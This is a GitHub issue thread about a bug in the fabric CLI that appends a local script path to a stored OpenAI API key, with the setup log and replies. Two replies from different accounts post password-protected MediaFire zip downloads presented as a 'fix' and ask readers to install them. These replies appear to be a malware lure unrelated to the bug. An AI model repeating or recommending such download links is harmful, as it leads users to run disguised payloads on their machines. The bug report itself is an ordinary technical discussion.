### ISSUE TITLE
[Bug]: Incorrect OpenAI API Key Storage in Fabric Configuration

### ISSUE THREAD

**Issue by IvanWeissVanDerPol** [danielmiessler/fabric#887]
### What happened?

Description:
When attempting to store the OpenAI API key in Fabric, an unrelated file path is appended to the API key, causing an error in subsequent calls. Specifically, instead of storing just the API key, Fabric stores the key concatenated with the file path of a Python script, as seen below:

Input API Key: sk-proj-EXAMPLEKEY12345_ABCDEFGHIJKLMNO67890
Stored Value: 'sk-proj-EXAMPLEKEY98765_ABCDEFGHIJKLMNO12345& C:/Users/WEISSIVA/AppData/Local/Programs/Python/Python312/python.exe c:/Users/WEISSIVA/Documents/facturas_rename/jsonMaker.py'
Steps to Reproduce:
Run the command fabric -S.
Enter the OpenAI API key when prompted.
Observe that the stored value includes an unrelated file path.
Expected Behavior:
The OpenAI API key should be stored without any appended file paths or unrelated information.

Actual Behavior:
The stored value includes both the API key and a file path to a local Python script, resulting in an error when attempting to use the API key.

Error Message:
OpenAI error, status code: 401, message: Incorrect API key provided: sk-proj-***************************************************************************************************************************************************************************r.py.

Environment:
OS: Windows
Python Version: Python 3.12

Additional Notes:
The issue occurs consistently every time the API key is entered.
No similar issues were encountered with other AI providers like Azure, Ollama, Grocq, Gemini, or Anthropic.

### Version check

- [X] Yes I was.

### Relevant log output

```shell
PS C:\Users\WEISSIVA> fabric -S

[Gemini]

Enter your Gemini API KEY (leave empty to skip):

[Gemini] skipped

[Anthropic]

Enter your Anthropic API KEY (leave empty to skip):

[Anthropic] skipped

[OpenAI]

Enter your OpenAI API KEY (leave empty to skip):
sk-proj-EXAMPLEKEY12345_ABCDEFGHIJKLMNO67890
[OpenAI] configured

[Azure]

Enter your Azure API KEY (leave empty to skip):

[Azure] skipped

[Ollama]

Enter your Ollama URL (as a reminder, it is usually http://localhost:11434) (leave empty to skip):

[Ollama] skipped

[Grocq]

Enter your Grocq API KEY (leave empty to skip):

[Grocq] skipped

Available vendor models:

OpenAI

        [1]     text-embedding-3-small
        [2]     gpt-4-0125-preview
        [3]     text-embedding-ada-002
        [4]     whisper-1
        [5]     dall-e-2
        [6]     tts-1-hd-1106
        [7]     tts-1-1106
        [8]     tts-1-hd
        [9]     dall-e-3
        [10]    babbage-002
        [11]    gpt-4-turbo-preview
        [12]    gpt-4-1106-preview
        [13]    gpt-4o-2024-05-13
        [14]    gpt-4
        [15]    gpt-3.5-turbo
        [16]    gpt-3.5-turbo-1106
        [17]    gpt-3.5-turbo-16k
        [18]    gpt-4o-mini
        [19]    gpt-4o-mini-2024-07-18
        [20]    chatgpt-4o-latest
        [21]    gpt-3.5-turbo-instruct-0914
        [22]    gpt-3.5-turbo-0125
        [23]    gpt-4o-2024-08-06
        [24]    gpt-4-0613
        [25]    gpt-3.5-turbo-instruct
        [26]    tts-1
        [27]    gpt-4-turbo-2024-04-09
        [28]    davinci-002
        [29]    gpt-4-turbo
        [30]    text-embedding-3-large
        [31]    gpt-4o

[Default]

Enter the index the name of your default model (leave empty to skip):
1

DEFAULT_VENDOR: OpenAI
DEFAULT_MODEL: text-embedding-3-small

[YouTube]

Enter your YouTube API KEY (leave empty to skip):
AIzaSyEXAMPLEKEY1234567890

[Patterns Loader]

Enter the default Git repository URL for the patterns (leave empty for 'https://github.com/danielmiessler/fabric.git' or type 'reset' to remove the value):

Enter the default folder in the Git repository where patterns are stored (leave empty for 'patterns' or type 'reset' to remove the value):

Downloading patterns and Populating C:\Users\WEISSIVA\.config\fabric\patterns..

PS C:\Users\WEISSIVA> fabric -S

[Azure]

Enter your Azure API KEY (leave empty to skip):

[Azure] skipped

[Ollama]

Enter your Ollama URL (as a reminder, it is usually http://localhost:11434) (leave empty to skip):

[Ollama] skipped

[Grocq]

Enter your Grocq API KEY (leave empty to skip):

[Grocq] skipped

[Gemini]

Enter your Gemini API KEY (leave empty to skip):

[Gemini] skipped

[Anthropic]

Enter your Anthropic API KEY (leave empty to skip):

[Anthropic] skipped

[OpenAI]

Enter your OpenAI API KEY (leave empty for 'sk-proj-EXAMPLEKEY98765_ABCDEFGHIJKLMNO12345& C:/Users/WEISSIVA/AppData/Local/Programs/Python/Python312/python.exe c:/Users/WEISSIVA/Documents/facturas_rename/jsonMaker.py' or type 'reset' to remove the value):

[OpenAI] configured
OpenAI error, status code: 401, message: Incorrect API key provided: sk-proj-***************************************************************************************************************************************************************************r.py. You can find your API key at https://platform.openai.com/account/api-keys.
```

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eugeis** [comment]
I can't reproduce, please retest in the current release and reopen if it still occurs.

**Comment by Romilunas** [comment]
I'm encountering the same issue
